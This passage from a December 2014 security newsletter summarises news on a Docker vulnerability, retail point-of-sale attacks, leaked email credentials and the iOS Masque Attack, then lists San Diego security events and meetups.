files that are not intended to be accessible to the container’s code. Several generations of the Docker container formatting system are subject to the vulnerability; only the latest version, Docker 1.3.2, is exempt. 
There’s no way to patch the thousands of copies of Docker with release numbers before the 1.3.2 release, according to companyrepresentatives — the only safeguard is to upgrade to the recent release. As hackers hit consumers, retailers keep quiet about security As the holiday buying season approaches, retailers remain open to the same attack – called a “point of sale” attack – that hit Target and Home Depot, security experts say. Those analysts say that retailers have their fingers crossed, hoping they’re not next. And leading companies are keeping very tight-lipped about what, if anything, they’re doing to protect customers. It’s easy to spot a scratched face on a watch. It’s much harder to tell if the checkout machine that you swipe to pay for that watch is defective. But Davi Ottenheimer knows how. He’s a security researcher at EMC, a Hopkinton, Mass.-based data storage company. He’s been auditing retail for a decade. And we’re looking at how “hackerproof” stores are this holiday shopping season. 6 million+ email accounts worldwide exposed in past 3 months More fallout from the epidemic of databreaches that occurred in 2014: More than 6 million email accounts and credentials from around the globe have been leaked in the past three months, according to a new study. Putting that into perspective, the researchers who gathered that data from the cybercrime market say they typically see around 150,000 such pilfered accounts per month. “This explosion can only be connected to the high number of data breaches that occurred in 2014,” Heimdal Security said in a blog post warning of the surge in stolen email account credentials. Cybersecurity was missing in action on Election Day In the run-up to the recent election, there were many discussions of issues like the Islamic State in Iraq and Syria (ISIS), immigration, the Ebola virus and the Keystone XL pipeline, just to name a few. The one area missing from the pre-election dialogue: a serious discussion about cybersecurity. 
Perhaps this was because discussions on cybersecurity can quickly turn into arcane discussions of technicaland policy minutiae, and candidates are incessantly advised by their handlers not to provide detailed positions on anything – to eschew the minutae in favor of the time-tested political platitude. The bumper sticker slogan always beats the well-reasoned complex argument in American politics. The Largest Cyber Attack In History Has Been Hitting Hong Kong Sites The largest cyber attack in history has been carried out against independent media sites in Hong Kong over the past few months. Masque Attack: All Your iOS Apps Belong to Us FireEye mobile security researchers have discovered that an iOS app installed using enterprise/ad-hoc provisioning could replace another genuine app installed through the App Store, as long as both apps used the samebundle identifier. The 10 Biggest Bank Card Hacks Underground Markets Online: Criminals Test Stolen Card Data on Charity Websites The top cloud computing threats and vulnerabilities in an enterprise environment Nearly half of all web application cyber attacks target retailers Your Wi-Fi’s WPA2 Encryption Can Be Cracked Offline: Here’s How ‘Most advanced mobile botnet EVER’ is coming for your OFFICE Androids U.S. Gov Insists It Doesn’t Stockpile Zero-Day Exploits to Hack Enemies For years the government has refused to talk about or even acknowledge its secret use of zero-day exploits to hack into the computers of adversaries and criminal suspects. But this year the Obama administration finally acknowledged what everyone… +++ SD/SoCAL security events / opportunities ++ CyberTECH events / networking / startups / etc — THE cyber happening place in SD!!! Join their Meetup Group for the latest event information! The definition of “Cyber KEWEL” Webster University’s new SD cyber security program – check it out.. DEC 16 – ISSA Annual elections and BIG prize raffle!! 
AND Ira Winkler, President ISSA International 18 – ISACA chapter meeting – Leveraging a Strong IT Audit and Information Security Partnership… BY Alex Branisteanu, Director Information Security, Scripps Health.. NEW LOCATION – Coleman University. JAN 15 – OWASP – Running InfoSec for America’s Finest City.. Gary Hayslip, CISO for the city of San Diego, 28 – International Data privacy day – all day event – “Securing the IoT Privacy masters” CyberTECH, SOeC, others) 30 – Cross Border cyber opportunities – MX/TJ and CA/SD collaboration event, all day Friday!!! (Hosted at Coleman University) – Contact me to join in… 31 Jan – Tentative – Started planning “BigDataDay 4 SD” all-day event – free – Jump in and help us! WE went to the one in LA and it was great… likely our three tracks will be: (1) Technical = Hadoop / Hbase / NoSQL; (2) Data science = predictive analytics, parallel algorithms, statistical modeling, algorithms for data mining, etc and (3) Applications = key use cases… Privacy by Design / data security, data start-ups /incubators, novel products, ++ Future events in planning FYI: TBD – Provided by IEEE Cyber SIG / Various Security groups – all day – – Privacy by design workshop – a cyber model & why you must be part of this initiative! (at Coleman University – AM Technical approach… PM public discussions) Help move SD forward in cyber – DOING security vs admiring the problem…. SO engage and help out on cyber 4 PbD!!! ++ Join our PbD / data security meetup, stay tuned into what’s happened.. See our over Cyber for PbD brief at AND Our more detailed technical paper on our Cyber 4 PbD approach, including an executable, proposed open privacy framework within an enterprise architecture is at (this rough draft is also getting ready to be published in a major IEEE magazine in Jan 2014):
December 6th, 2014